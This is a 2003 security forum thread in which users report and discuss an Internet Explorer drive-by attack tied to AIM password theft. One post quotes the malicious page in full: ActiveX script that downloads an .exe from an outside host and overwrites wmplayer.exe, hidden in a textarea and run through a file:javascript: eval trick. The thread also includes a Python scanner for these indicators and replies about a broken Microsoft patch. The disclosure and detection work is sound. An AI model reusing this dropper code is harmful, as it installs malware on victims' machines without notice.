
Thread: AIM Password theft

  1. #1
    Join Date
    Jun 2003

    Question AIM Password theft

    My apologies if this is in the wrong forum, I couldn't decide where to post.

    There has been only one reply to the incidents mailing list, and I'm wondering if you folks could provide any insights. I have additional e-mails describing the problem, if anyone's interested.



    ------------email to follow----------------
    The code you just sent looks familiar to a SPAM I received
    attempting to hijack users' e-gold accounts. Out of curiosity I
    followed that link which loaded start.html (attached). What worries me
    is that I'm running IE 6.0.2800.1106 with all the latest patches from
    Microsoft and this page (start.html) rewrote wmplayer.exe on my local
    drive without notice. After closing the page, I found two .exe files on
    my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe).
    Is this a new unknown vulnerability?

    Brent Meshier
    Global Transport Logistics, Inc.
    "Innovative Fulfillment Solutions"

    -----Original Message-----
    From: Mark Coleman [mailto:markc@uniontown.com]
    Sent: Tuesday, September 23, 2003 11:43 AM
    To: bugtraq@securityfocus.org
    Subject: [Fwd: Re: AIM Password theft]

    Hi, can anyone shed some light on this for me? If this is new, it's
    going to spread like wildfire. AOL or incidents lists have yet to
    reply.... it appears to be a legitimate threat as I have at least one
    user "infected" already.. Thank you..

    -Mark Coleman

    <script language="vbs">
    self.MoveTo 5000,5000
    <object data="1.php"></object>

    <textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://doz.linux162.onway.net/eg/1.exe",0);

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";


    <script language="javascript">

    function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {

    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");

    if (line != '') {
    result += line +'\\r\\n';
    return result;

    function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";


    setTimeout("doit()", 5000);
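
A static triage check for the page quoted in the post above, added here as an example and not code from the thread or its posters: it flags the indicators visible in that page and records which element each one sits in, because the download-and-save script is staged in a hidden textarea, where a scanner that reads only script blocks would not look. The indicator names, verdict labels and the placeholder host are assumptions.

```python
import re
from html.parser import HTMLParser
# Indicators taken from the page quoted in the post above.
INDICATORS = {
    "activex_xmlhttp": re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP', re.I),
    "activex_adodb_stream": re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream', re.I),
    "save_to_local_path": re.compile(r'\.SaveToFile\(\s*["\'][A-Za-z]:\\', re.I),
    "remote_exe_url": re.compile(r'https?://[^\s"\']+\.exe\b', re.I),
    "offscreen_window": re.compile(r'\bMoveTo\s*\(?\s*\d{4,}\s*,\s*\d{4,}', re.I),
    "file_javascript_url": re.compile(r'file:javascript:', re.I),
}
# Remote .exe + ADODB.Stream + write to a local path = download-and-overwrite.
DROPPER_CORE = {"activex_adodb_stream", "save_to_local_path", "remote_exe_url"}

class PageScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = set()   # (indicator, enclosing element) pairs
        self._where = None
    def handle_starttag(self, tag, attrs):
        if tag == "object" and dict(attrs).get("data"):
            self.findings.add(("object_data_tag", "object"))
        if tag in ("script", "textarea"):
            self._where = tag   # text in either element is treated as code
    def handle_endtag(self, tag):
        if tag == self._where:
            self._where = None
    def handle_data(self, data):
        if self._where:
            for name, rx in INDICATORS.items():
                if rx.search(data):
                    self.findings.add((name, self._where))

def scan_page(html):
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
def verdict(html):
    names = {name for name, _ in scan_page(html)}
    return "block" if DROPPER_CORE <= names else "review" if names else "clean"
# Constructed sample: inert fragments of the quoted page, placeholder host.
SAMPLE = r'''<script language="vbs">self.MoveTo 5000,5000</script>
<object data="1.php"></object>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://host.example.invalid/eg/1.exe",0);
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</textarea>'''
```

On the sample, every indicator in `DROPPER_CORE` is reported with location `textarea`, none with `script`.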


  2. #2
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    There have been several more replies discussing it...


  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Washington D.C. area
    Yeah, this has been kicked around BugTraq for a few days now. From what I remember, the patch that is supposed to fix the Data Object issue does not work. MS made a public announcement of this on the main page of the download section. Something about testing the claims that the patch is claimed to be broken and they will release a new one if they can confirm the claim.

    Here is the link and a snip from the page:
    "Microsoft originally issued this bulletin on August 20th, 2003. Subsequent to issuing the security bulletin, Microsoft received reports that the patch provided with this bulletin does not properly correct the Object Type Vulnerability (CAN-2003-0532)."

    See the technical details section.

    Then there is the actual bulletin:
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
